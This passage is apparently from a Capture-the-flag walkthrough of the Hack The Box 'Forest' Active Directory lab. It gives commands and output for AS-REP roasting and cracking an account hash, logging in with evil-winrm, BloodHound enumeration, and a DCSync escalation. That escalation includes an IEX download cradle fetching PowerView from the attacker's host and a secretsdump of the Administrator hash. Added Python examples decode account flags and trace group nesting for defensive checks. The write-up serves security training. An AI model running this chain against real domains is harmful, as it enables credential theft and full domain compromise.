[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:650fb4079f5387180c20c639a22aea29$39ca0c3cb5144bf7781a8aa2e72599a9770f7854f10422dd0e6a0497888034d004ece47c977f9b900dc5760b92d2d8500d4d77dc2e01744fd72b242e2dd7298c0cccb0dfd145b0dcecb1d99f690977c94fc2a25ebcae6e156a80d84b53da0b2d23c3e0c8879debe6bac3ef78b8ea81ea469aa3a770a1785c19a8972aa94e504c5e64fa0faf4e52294d1b46850287276019728c31acd9d4e9dde0bff4abb9c4825e9ccadfc7092134dd80168e650a4e8a921633da8cdd84f76bfffce20ee52019f94ceea61b590b65dc02cee2062327273c6198b5dd38c858fcd928180fe7eb025c9c1da11982
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
Kerberos returned the ticket for the user "svc-alfresco".
Let's store it in a text file:
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# nvim svc-alfresco.txt
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# cat svc-alfresco.txt
File: svc-alfresco.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:650fb4079f5387180c20c639a22aea29$39ca0c3cb5144bf7781a8aa2e72599a9770f7854f10422dd0e6a0497888034d004ece47c977f9b900dc5760b92d2d8500d4d77dc2e01744fd72b242e2dd7298c0cccb0dfd145b0dcecb1d99f690977c94fc2a25ebcae6e156a80d84b53da0b2d23c3e0c8879debe6bac3ef78b8ea81ea469aa3a770a1785c19a8972aa94e504c5e64fa0faf4e52294d1b46850287276019728c31acd9d4e9dde0bff4abb9c4825e9ccadfc7092134dd80168e650a4e8a921633da8cdd84f76bfffce20ee52019f94ceea61b590b65dc02cee2062327273c6198b5dd38c858fcd928180fe7eb025c9c1da11982
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
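Both the username cleanup in 2.1 and the outcome of 2.2 can be read straight from the enum4linux output: the acb column is the SAMR userAccountControl bitmask (MS-SAMR 2.2.1.12), so the one enabled account with the don't-require-preauth bit set (svc-alfresco, 0x00010210) and the disabled accounts that came back as KDC_ERR_CLIENT_REVOKED (Guest, krbtgt, DefaultAccount, acb bit 0x1) are visible before any Kerberos request is made. This is also the check an AD administrator runs to find accounts exposed this way. The following Python is an added example written for this page, not part of the writeup or of enum4linux; the sample lines are copied from the output above, the Exchange-account prefixes mirror the grep filter used earlier, and the function names are my own.

```python
import re
from typing import List, NamedTuple


class SamUser(NamedTuple):
    account: str
    rid: int
    acb: int
    name: str


# The "acb" column is the SAMR userAccountControl bitmask (MS-SAMR 2.2.1.12,
# USER_ACCOUNT codes). Note this is a different encoding from the LDAP
# userAccountControl attribute, where the preauth bit is 0x400000.
ACB_FLAGS = (
    (0x00000001, "DISABLED"), (0x00000002, "HOMDIRREQ"), (0x00000004, "PWNOTREQ"),
    (0x00000008, "TEMPDUP"), (0x00000010, "NORMAL"), (0x00000020, "MNS"),
    (0x00000040, "DOMTRUST"), (0x00000080, "WSTRUST"), (0x00000100, "SVRTRUST"),
    (0x00000200, "PWNOEXP"), (0x00000400, "AUTOLOCK"), (0x00000800, "ENC_TXT_PWD_ALLOWED"),
    (0x00001000, "SMARTCARD_REQUIRED"), (0x00002000, "TRUSTED_FOR_DELEGATION"),
    (0x00004000, "NOT_DELEGATED"), (0x00008000, "USE_DES_KEY_ONLY"),
    (0x00010000, "DONT_REQUIRE_PREAUTH"), (0x00020000, "PW_EXPIRED"),
    (0x00040000, "TRUSTED_TO_AUTH_FOR_DELEGATION"), (0x00080000, "NO_AUTH_DATA_REQUIRED"),
    (0x00100000, "PARTIAL_SECRETS_ACCOUNT"), (0x00200000, "USE_AES_KEYS"),
)
ACB_DISABLED = 0x00000001
ACB_DONT_REQUIRE_PREAUTH = 0x00010000

# One user line from enum4linux's "Users on <host>" section. Name may contain spaces.
USER_RE = re.compile(
    r"^index:\s+0x[0-9a-f]+\s+RID:\s+(?P<rid>0x[0-9a-f]+)\s+acb:\s+(?P<acb>0x[0-9a-f]+)"
    r"\s+Account:\s+(?P<account>\S+)\s+Name:\s+(?P<name>.*?)\s+Desc:\s+(?P<desc>.*)$"
)

# Accounts Exchange creates on install; prefix rules rather than substring greps so a
# human account whose name merely contains "SM" or "Mail" is not dropped.
EXCHANGE_PREFIXES = ("HealthMailbox", "SM_", "$")

# Constructed sample: a subset of the user lines from the enum4linux output above.
SAMPLE_ENUM4LINUX = """\
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
"""


def parse_enum4linux_users(text: str) -> List[SamUser]:
    users: List[SamUser] = []
    for line in text.splitlines():
        m = USER_RE.match(line.strip())
        if m:
            users.append(SamUser(m.group("account"), int(m.group("rid"), 16),
                                 int(m.group("acb"), 16), m.group("name")))
    return users


def decode_acb(acb: int) -> List[str]:
    """Names of the set bits, lowest first; bits outside the table are reported as hex."""
    names = [name for bit, name in ACB_FLAGS if acb & bit]
    leftover = acb & ~sum(bit for bit, _ in ACB_FLAGS)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:x}")
    return names


def is_exchange_system_account(account: str) -> bool:
    return account.startswith(EXCHANGE_PREFIXES)


def clean_usernames(users: List[SamUser]) -> List[str]:
    return [u.account for u in users if not is_exchange_system_account(u.account)]


def preauth_not_required(users: List[SamUser]) -> List[str]:
    """Enabled accounts whose AS-REP the KDC hands out without pre-authentication."""
    return [u.account for u in users
            if u.acb & ACB_DONT_REQUIRE_PREAUTH and not u.acb & ACB_DISABLED]


def disabled_accounts(users: List[SamUser]) -> List[str]:
    return [u.account for u in users if u.acb & ACB_DISABLED]


if __name__ == "__main__":
    users = parse_enum4linux_users(SAMPLE_ENUM4LINUX)
    for u in users:
        print(f"{u.account:24} rid={u.rid:<5} {'|'.join(decode_acb(u.acb))}")
    print("no preauth:", preauth_not_required(users))
    print("disabled:  ", disabled_accounts(users))
```

The remediation on the directory side is simply clearing that bit on the account (the "Do not require Kerberos preauthentication" option), which the same decoder can confirm after the change.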
2.3 John The Ripper with the hash obtained from the Kerberos ticket
With the hash for the user "svc-alfresco" in hand, we use John The Ripper to recover its password in plaintext:
john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco.txt
(We use the rockyou dictionary; the password policy enumerated earlier, complexity disabled and a 7-character minimum, makes a dictionary hit likely)
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:08 DONE (2025-03-06 15:10) 0.1141g/s 466410p/s 466410c/s 466410C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
We obtained the password
User: svc-alfresco
Password: s3rvice
2.4 Reverse shell with evil-winrm
Now we use crackmapexec to verify the credentials we obtained before logging in with "evil-winrm", adding the "-d" parameter to specify the domain:
crackmapexec winrm -u 'svc-alfresco' -p 's3rvice' -d htb.local 10.10.10.161
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# crackmapexec winrm -u 'svc-alfresco' -p 's3rvice' -d htb.local 10.10.10.161
HTTP 10.10.10.161 5985 10.10.10.161 [*] http://10.10.10.161:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.10.161 5985 10.10.10.161 [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
Now that we know the credentials are valid, we log in with "evil-winrm":
evil-winrm -u 'svc-alfresco' -p 's3rvice' -i 10.10.10.161
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# evil-winrm -u 'svc-alfresco' -p 's3rvice' -i 10.10.10.161
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
2.5 Getting the user flag
The user flag is in the absolute path "C:\Users\svc-alfresco\Desktop":
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd "C:\Users\svc-alfresco\Desktop"
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
f8cd89b0843eea69160d5c5448e0ec96
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
3- Privilege escalation
3.1 BloodHound
To escalate privileges we use BloodHound, a tool for Active Directory environments that enumerates the permissions of the directory's users in much more detail.
To use BloodHound we need to start a service on Kali called neo4j, the database BloodHound stores its graph in; neo4j listens on port 7687. We install it with the "apt" package manager:
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# sudo apt-get install neo4j
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias... Hecho
Leyendo la información de estado... Hecho
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
libldap-2.5-0 libpython3.12-dev python3.12 python3.12-dev python3.12-minimal python3.12-venv
Utilice «sudo apt autoremove» para eliminarlos.
Se instalarán los siguientes paquetes adicionales:
binfmt-support fastjar jarwrapper openjdk-11-jre openjdk-11-jre-headless
Paquetes sugeridos:
fonts-ipafont-gothic fonts-ipafont-mincho fonts-wqy-microhei | fonts-wqy-zenhei fonts-indic
Se instalarán los siguientes paquetes NUEVOS:
binfmt-support fastjar jarwrapper neo4j openjdk-11-jre openjdk-11-jre-headless
0 actualizados, 6 nuevos se instalarán, 0 para eliminar y 785 no actualizados.
Se necesita descargar 138 MB de archivos.
Se utilizarán 289 MB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n] S
And to start neo4j, we use the "neo4j console" command:
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2025-03-06 18:30:32.789+0000 INFO Starting...
2025-03-06 18:30:34.545+0000 INFO This instance is ServerId{7e9c33b3} (7e9c33b3-8359-4c29-913d-b4b46de030b1)
2025-03-06 18:30:36.430+0000 INFO ======== Neo4j 4.4.26 ========
2025-03-06 18:30:38.655+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2025-03-06 18:30:38.669+0000 INFO Setting up initial user from defaults: neo4j
2025-03-06 18:30:38.672+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2025-03-06 18:30:38.695+0000 INFO Setting version for 'security-users' to 3
2025-03-06 18:30:38.699+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2025-03-06 18:30:38.710+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-03-06 18:30:41.792+0000 INFO Bolt enabled on localhost:7687.
2025-03-06 18:30:43.084+0000 INFO Remote interface available at http://localhost:7474/
2025-03-06 18:30:43.090+0000 INFO id: A53CF8AB6179D63A38C7EFF613B6CBB1EA39E685117FA81BEE0560291EF861FF
2025-03-06 18:30:43.090+0000 INFO name: system
2025-03-06 18:30:43.091+0000 INFO creationDate: 2025-03-06T18:30:37.203Z
2025-03-06 18:30:43.091+0000 INFO Started.
We can see that the "neo4j" service is running correctly and is bound only to localhost: Bolt on port 7687 and the web interface at "http://localhost:7474/", so we open our preferred browser in Kali and go to "neo4j":

We get a login panel; the default credentials are "neo4j/neo4j":

It will ask us for a new password:

We enter it:

And finally, we install BloodHound with "apt", since it is already in the official Kali repositories:
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# sudo apt-get install bloodhound
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias... Hecho
Leyendo la información de estado... Hecho
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
libldap-2.5-0 libpython3.12-dev python3.12 python3.12-dev python3.12-minimal python3.12-venv
Utilice «sudo apt autoremove» para eliminarlos.
Se instalarán los siguientes paquetes NUEVOS:
bloodhound
0 actualizados, 1 nuevos se instalarán, 0 para eliminar y 785 no actualizados.
Se necesita descargar 69,3 MB de archivos.
Se utilizarán 274 MB de espacio de disco adicional después de esta operación.
Des:1 http://kali.download/kali kali-rolling/main amd64 bloodhound amd64 4.3.1-0kali2 [69,3 MB]
Descargados 69,3 MB en 7s (9.532 kB/s)
Seleccionando el paquete bloodhound previamente no seleccionado.
(Leyendo la base de datos ... 411133 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../bloodhound_4.3.1-0kali2_amd64.deb ...
Desempaquetando bloodhound (4.3.1-0kali2) ...
Configurando bloodhound (4.3.1-0kali2) ...
Procesando disparadores para kali-menu (2025.1.1) ...
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
We run BloodHound:

And we enter the neo4j credentials, including the new password we set in the neo4j panel:
(The user is still "neo4j" and the password is the one we set earlier when neo4j asked us to change it after installation)

3.2 SharpHound
To extract the information from the target machine we are going to use "SharpHound", which enumerates the Active Directory environment and compresses the results into a .ZIP that we will then feed to "BloodHound". SharpHound belongs to the BloodHound tool suite.
We can download SharpHound from the official GitHub repository; in my case I will use the latest SharpHound release at the time of writing, release 2.6.0:
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# ls -la | grep 'SharpHound'
-rw-rw-r-- 1 t0mz t0mz 1275392 mar 4 23:23 SharpHound.exe
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
Once downloaded, we transfer this "SharpHound" file to the target machine where we obtained a shell with "evil-winrm"; for that we use the "upload" command built into "evil-winrm" itself, with the following syntax:
upload {absolute path of SharpHound.exe}
In my case:
upload /home/t0mz/ctf/forest/SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> upload /home/t0mz/ctf/forest/SharpHound.exe
Info: Uploading /home/t0mz/ctf/forest/SharpHound.exe to C:\Users\svc-alfresco\Desktop\SharpHound.exe
Data: 1700520 bytes of 1700520 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
And we run it:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> .\SharpHound.exe
2025-03-06T11:13:02.4769017-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-03-06T11:13:02.6644092-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-03-06T11:13:02.7269185-08:00|INFORMATION|Initializing SharpHound at 11:13 AM on 3/6/2025
2025-03-06T11:13:02.7894015-08:00|INFORMATION|Resolved current domain to htb.local
2025-03-06T11:13:03.1644257-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-03-06T11:13:03.3050276-08:00|INFORMATION|Beginning LDAP search for htb.local
2025-03-06T11:13:03.4769038-08:00|INFORMATION|Beginning LDAP search for htb.local Configuration NC
2025-03-06T11:13:03.4925238-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for HTB.LOCAL
2025-03-06T11:13:03.4925238-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for HTB.LOCAL
2025-03-06T11:13:03.5706477-08:00|INFORMATION|Producer has finished, closing LDAP channel
2025-03-06T11:13:03.5862723-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-03-06T11:13:04.2737754-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for HTB.LOCAL
2025-03-06T11:13:05.7581481-08:00|ERROR|An unhandled error occurred during the LDAP test: System.InvalidOperationException: Server did return a challenge
at SharpHoundCommonLib.Ntlm.LdapConnection.SaslBind(String distinguishedName, String mechanism, Byte[] credential)
at System.Threading.Tasks.Task`1.InnerInvoke()
at System.Threading.Tasks.Task.Execute()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at SharpHoundCommonLib.Ntlm.LdapTransport.<AuthenticateAsync>d__12.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at SharpHoundCommonLib.Ntlm.NtlmAuthenticationHandler.<PerformNtlmAuthenticationAsync>d__7.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at SharpHoundCommonLib.Processors.DCLdapProcessor.<Authenticate>d__14.MoveNext()
2025-03-06T11:13:05.8206553-08:00|INFORMATION|Consumers finished, closing output channel
2025-03-06T11:13:05.9300293-08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-03-06T11:13:06.3987895-08:00|INFORMATION|Status: 475 objects finished (+475 158.3333)/s -- Using 45 MB RAM
2025-03-06T11:13:06.3987895-08:00|INFORMATION|Enumeration finished in 00:00:03.1164499
2025-03-06T11:13:06.5394114-08:00|INFORMATION|Saving cache with stats: 24 ID to type mappings.
0 name to SID mappings.
1 machine sid mappings.
3 sid to domain mappings.
0 global catalog mappings.
2025-03-06T11:13:06.5706657-08:00|INFORMATION|SharpHound Enumeration Completed at 11:13 AM on 3/6/2025! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
We list the directory:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/6/2025 11:13 AM 44259 20250306111305_BloodHound.zip
-a---- 3/6/2025 11:13 AM 1768 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 3/6/2025 11:11 AM 1275392 SharpHound.exe
-ar--- 3/6/2025 6:36 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
And to download the .ZIP file the tool generated, we use the "download" command that is also built into "evil-winrm":
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20250306111305_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Desktop\20250306111305_BloodHound.zip to 20250306111305_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# ls
20250306111305_BloodHound.zip escaneo.txt ping.txt SharpHound.exe svc-alfresco.txt users.txt
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
And now we can import the .ZIP file into BloodHound with the following button on the right of the BloodHound panel:


And we wait for the data from the ZIP file to finish uploading:

Once everything is loaded, we search for the user "svc-alfresco" in the search field:

We right-click the user and select "Mark User as Owned" and then "Set as Starting Node":

The whole topology of groups and users in the Active Directory appears:

Investigating in BloodHound, I noticed that the user "svc-alfresco" has permissions to create users (ACCOUNT OPERATORS@HTB.LOCAL) inside the Active Directory environment (SERVICE ACCOUNTS@HTB.LOCAL)

We can see that the user we compromised, "svc-alfresco", belongs to the group "SERVICE ACCOUNTS@HTB.LOCAL", which in turn belongs to "PRIVILEGED IT ACCOUNTS@HTB.LOCAL", and that the group "PRIVILEGED IT ACCOUNTS@HTB.LOCAL" in turn belongs to "ACCOUNT OPERATORS@HTB.LOCAL". Nested membership like this is exactly what "net user" does not show and BloodHound does.
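As an added example (not part of the write-up or of BloodHound itself), the following Python walks the nested membership shown above BloodHound-style and reports the shortest path from the owned user to each high-value node. The edge list is constructed: the three MemberOf edges are the ones found above; the GenericAll edge onto Exchange Windows Permissions and the WriteDacl edge onto the domain object are assumptions of the example.

```python
"""Walk nested group membership and ACL edges, BloodHound-style, to show why
svc-alfresco ends up with Account Operators rights and how far that reaches.
The edge list below is constructed for this example."""
from collections import defaultdict, deque

# (source, relationship, target).  The first three edges are the chain the
# write-up found in BloodHound.  The last two are ASSUMED for this example:
# Account Operators can manage the Exchange Windows Permissions group, and
# that group holds WriteDacl on the domain object.
EDGES = [
    ("SVC-ALFRESCO@HTB.LOCAL", "MemberOf", "SERVICE ACCOUNTS@HTB.LOCAL"),
    ("SERVICE ACCOUNTS@HTB.LOCAL", "MemberOf", "PRIVILEGED IT ACCOUNTS@HTB.LOCAL"),
    ("PRIVILEGED IT ACCOUNTS@HTB.LOCAL", "MemberOf", "ACCOUNT OPERATORS@HTB.LOCAL"),
    ("ACCOUNT OPERATORS@HTB.LOCAL", "GenericAll", "EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL"),
    ("EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL", "WriteDacl", "HTB.LOCAL"),
]

# Nodes an ordinary service account should never be able to reach.
HIGH_VALUE = {"ACCOUNT OPERATORS@HTB.LOCAL", "DOMAIN ADMINS@HTB.LOCAL", "HTB.LOCAL"}


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    graph = defaultdict(list)
    for src, rel, dst in edges:
        graph[src].append((rel, dst))
    return graph


def effective_groups(principal, edges):
    """Transitive closure over MemberOf edges only: every group the principal
    belongs to directly or through nesting."""
    graph = build_graph(edges)
    seen, queue = set(), deque([principal])
    while queue:
        node = queue.popleft()
        for rel, nxt in graph[node]:
            if rel == "MemberOf" and nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def shortest_paths(start, edges, targets):
    """BFS over all edge types.  Returns {target: [(src, rel, dst), ...]} for
    each target reachable from start; unreachable targets are absent."""
    graph = build_graph(edges)
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for rel, nxt in graph[node]:
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    paths = {}
    for target in targets:
        if target not in parent:
            continue
        steps, node = [], target
        while parent[node] is not None:
            prev, rel = parent[node]
            steps.append((prev, rel, node))
            node = prev
        paths[target] = steps[::-1]
    return paths


def format_path(steps):
    """Render a path as 'A -[MemberOf]-> B -[WriteDacl]-> C'."""
    if not steps:
        return ""
    out = steps[0][0]
    for _, rel, dst in steps:
        out += f" -[{rel}]-> {dst}"
    return out


if __name__ == "__main__":
    user = "SVC-ALFRESCO@HTB.LOCAL"
    print("effective groups:", sorted(effective_groups(user, EDGES)))
    for target, steps in shortest_paths(user, EDGES, HIGH_VALUE).items():
        print(f"{target}: {format_path(steps)}")
```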
3.3 DCSync attack - WriteAcl
We are going to perform a DCSync attack to obtain the users' hashes, among them the "Administrator" user's.
As we saw, the user "svc-alfresco" can create users, so we create one from the "evil-winrm" shell and list information about it:
*Evil-WinRM* PS C:\Users> net user t0mz password1 /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user t0mz
User name t0mz
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/6/2025 1:30:29 PM
Password expires Never
Password changeable 3/7/2025 1:30:29 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users>
And now we add the user we just created to the "Exchange Windows Permissions" group:

*Evil-WinRM* PS C:\Users> net group "Exchange Windows Permissions" t0mz /add
The command completed successfully.
*Evil-WinRM* PS C:\Users>
Now we are going to grant the DCSync privilege to the user we just created. First we store its password as a secure string with the following command:
$SecPassword = ConvertTo-SecureString 'password1' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $SecPassword = ConvertTo-SecureString 'password1' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
And then we wrap that credential in a PSCredential object with the following command:
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\t0mz', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\t0mz', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
And now, to act with this "$Cred" object we just created, we are going to use "PowerView.ps1" from the PowerSploit repository (its Add-DomainObjectAcl cmdlet is what modifies the domain ACL), so we download the following script:
We download it with "wget":
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1
--2025-03-06 19:45:35-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[185.199.111.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 770279 (752K) [text/plain]
Grabando a: «PowerView.ps1»
PowerView.ps1 100%[====================================================>] 752,23K --.-KB/s en 0,08s
2025-03-06 19:45:35 (8,82 MB/s) - «PowerView.ps1» guardado [770279/770279]
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# ls -la | grep 'PowerView.ps1'
-rw-r--r-- 1 root root 770279 mar 6 19:45 PowerView.ps1
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
We host a web server with Python to transfer the file to the target machine:
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
And we go back to "evil-winrm" to fetch and load the script in memory with the command:
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.12/PowerView.ps1')
In my case, the IP that the Hack The Box VPN assigned me is 10.10.14.12; in your case you should use the IP Hack The Box assigned you
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.12/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
And now we grant the DCSync right to the user we created with the following command:
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity t0mz -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity t0mz -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
Finally, we obtain the hashed credential of the "Administrator" user; for that we use "impacket-secretsdump" with the following command, giving it the domain, the user and the IP:
impacket-secretsdump htb.local/t0mz@10.10.10.161
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# impacket-secretsdump htb.local/t0mz@10.10.10.161
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Cleaning up...
As we can see, it dumped the password hashes of every user in this machine's Active Directory environment.
